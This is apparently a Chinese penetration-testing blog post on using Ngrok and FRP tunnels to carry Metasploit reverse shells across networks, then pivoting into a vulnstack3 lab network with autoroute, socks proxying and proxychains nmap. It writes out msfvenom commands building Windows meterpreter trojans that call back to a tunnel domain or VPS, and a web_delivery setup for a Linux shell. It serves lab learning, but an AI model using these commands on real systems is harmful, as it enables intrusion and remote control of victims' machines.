流量操纵——代理

未完,后续更新

当攻击者与受害者不再同一网络中,就需要使用代理来解决二者的连同问题,这就有了代理

Ngrok

官网:https://www.ngrok.cc/
使用教程:https://www.ngrok.cc/_book/start/ngrok_linux.html

实践流程:去ngrok注册一个账户,并获取一个服务器,由这个服务器作为中间人,连同分别处于内网中的攻击者和受害者。由于条件有限,将就一下了,kali当作攻击者,win7充当受害者,都是NAT网络。

流程图

在这里插入图片描述

准备一个服务器

  1. 购买服务器

注册登录之后,直接来到隧道管理 | 开通隧道。付费的稳定,速度快;免费的反之,这里选择免费的作为演示。点击“立即购买”之后,会出现一个弹窗,不用管他,直接点击“确定”即可
在这里插入图片描述

  1. 设置隧道

在这里插入图片描述

  1. 隧道状态

完成添加之后,会看到这样一个东西
在这里插入图片描述

  1. 下载客户端

点击“客户端下载”,来到下载页面,根据你的需要下载相关客户端
在这里插入图片描述

攻击者连接ngrok

把Ngrok客户端放到kali上面,启动客户端

  1. 下载解压之后,就是这么个东西

在这里插入图片描述

  1. 运行客户端
./sunny clientid 隧道id

在这里插入图片描述

准备木马

生成木马,lhost即ngrok客户端显示的域名,lport即80端口,通过这个端口去访问你写的域名!

msfvenom -p windows/meterpreter/reverse_http lhost=msftest.free.idcfengye.com lport=80 -f exe -o test.exe
  1. 把生成的木马种到win7上面
  2. msf开启监听

由于设置服务器的时候,写的是127.0.0.1:4444,并且运行ngrok客户端的时候显示的也是这个地址,即:ngrok服务器会把收到的内容传到127.0.0.1:4444,所以msf监听的是就得是这个地址。
在这里插入图片描述

  1. 木马上线

在win7上面运行木马

战果

因为服务器是免费的,所以反应比较慢

  1. 当win7运行木马,ngrok会收到信息,如下

在这里插入图片描述

  1. msf会拿到meterpreter

在这里插入图片描述

Frp

项目地址:https://github.com/fatedier/frp

逻辑图

在这里插入图片描述

什么是frp

FRP(Fast Reverse Proxy) 是一款简单,好用,稳定的隧道工具。FRP 使用 Go 语言开发,它是一款高性能的反向代理应用,可以轻松地进行内网穿透,对外网提供服务。FRP 支持 TCP、UDP、KCP、HTTP、HTTPS等协议类型,并且支持 Web 服务根据域名进行路由转发。在进行内网渗透中,FRP是常用的一款隧道工具。

说人话就是:你有一个公网服务器,在上面部署frp即可穿透内网。
相较于ngrok,由于是自己的服务器,速度快,连接稳定,隐私有保障,工具灵活性高。

文件说明

服务端 frps.ini 如下


[common]
bind_addr = 0.0.0.0        #绑定的ip,为本机
bind_port = 17000          #绑定的端口
dashboard_addr = 0.0.0.0   #管理地址
dashboard_port = 27500     #管理端口
dashboard_user = root      #管理的用户名
dashboard_pwd  = 123456    #管理用户的密码
token = 1q2w3e             #客户端服务端连接的密码
heartbeat_timeout = 90     #心跳超时时间
max_pool_count = 5         #最大同时连接数

客户端 frpc.ini 如下

[common]
server_addr = 100.20.14.14
server_port = 17000           #服务器绑定的端口
token = 1q2w3e                #连接的密码
pool_count = 5        
protocol = tcp                #协议类型
health_check_type = tcp
health_check_interval_s = 100
[test] 
remote_port = 10000           #代理的端口
plugin = socks5               #使用的协议
use_encryption = true         #是否加密
use_compression = true

vps部署frp服务端

  1. 下载
wget https://github.com/fatedier/frp/releases/download/v0.37.0/frp_0.37.0_linux_amd64.tar.gz
  1. 解压
tar -xzvf frp_0.37.0_linux_amd64.tar.gz
  1. 编辑服务器的配置文件frps.ini

在这里插入图片描述

修改结果如下
在这里插入图片描述

  1. 启动服务端

frp服务端监听本地的6677端口

./frps -c ./frps.ini

在这里插入图片描述

kali部署frp客户端

[common]
server_addr = 服务器公网ip
server_port = 6677   # frpc工作端口,与上面frps保持一致

[ssh]
local_ip = 127.0.0.1
local_port = 5555    # 转发给本机的5555
remote_port = 6000   # 在服务端注册端口,服务端用6000端口转发给本机

启动客户端:./frpc -c ./frpc.ini
  1. 修改客户端配置文件

在这里插入图片描述

  1. 连接服务器

在这里插入图片描述

  1. 服务器收到来自客户端的连接信息

在这里插入图片描述

制作木马

使用下面的命令制作木马,并将其种到win7上面,执行木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=服务器公网ip lport=6000 -f exe -o frp.exe

战果

  1. 开启msf监听

在这里插入图片描述

  1. win7运行木马
  2. msf拿到会话

在这里插入图片描述

  1. frp客户端记录流量

在这里插入图片描述

  1. frp服务器端记录数据

在这里插入图片描述

最后,事情真的有这么麻烦吗?非也,vps直接就能干架,因为我的vps是kali ( •̀ ω •́ )✧
在这里插入图片描述

内网跳板机

使用环境是红日安全的vulnstack3
在这里插入图片描述

连接MSF

  1. 使用脏牛提权,以firefart:123456账密登录CentOS
  2. kali执行下面命令会生成一串代码,复制扫CentOS执行,上线靶机。实战开始
msf6 > use exploit/multi/script/web_delivery
msf6 exploit(multi/script/web_delivery) > set target 7
msf6 exploit(multi/script/web_delivery) > set payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > set lhost  192.168.239.141
msf6 exploit(multi/script/web_delivery) > set lport 6666
msf6 exploit(multi/script/web_delivery) > exploit

配置路由

  1. 查看CentOS的网卡信息

查看网络接口信息:run get_local_subnets
查看活动路由列表:run autoroute -p
发现目标存在93内网网段,并且没有路由信息
在这里插入图片描述

  1. 添加内网路由

run autoroute -s 192.168.93.0/24:以CIDR的方式添加路由信息
在这里插入图片描述

配置socks

在msf6中,一些设置发生了变化

  1. 配置socks_proxy,并运行

在这里插入图片描述

  1. 配置proxychains4.conf

发现,只有proxychains4.conf,没有proxychains.conf了
在这里插入图片描述

由于socks_proxy默认端口是1080,代理类型是socks5,因此proxychains4.conf无需修改
在这里插入图片描述

  1. 使用proxychains4.conf配合nmap扫描内网

由于环境拓扑事先知道,就直接开扫指定ip了

proxychains4 nmap -Pn -sT -sV 192.168.93.10 192.168.93.20 192.168.93.30 -F

开始扫描
在这里插入图片描述

扫描结果
在这里插入图片描述

警告:nmap需要加Pn和sT,否则会出错
原因:

  1. socks_proxy使用的是socks5,不支持ping,所以使用-Pn : 不进行ping扫描
  2. 如果把sT换成别的tcp扫描,会失败。原因咱不知道。

在这里插入图片描述

访问内网

为了增加点趣味性,我在靶机win7(192.168.93.30)上面安装phpstudy,部署dvwa。来演示一下外网的kali如何访问内网,甚至建立webshell

  1. 在win7上面下载安装phpstudy部署dvwa
  2. 设置kali的浏览器代理。代理的协议、ip、端口要与前面保持一致

在这里插入图片描述

  1. 成功访问win7的网站

在这里插入图片描述

Supongo que te gusta

Origin blog.csdn.net/weixin_44288604/article/details/120683935
Recomendado
Clasificación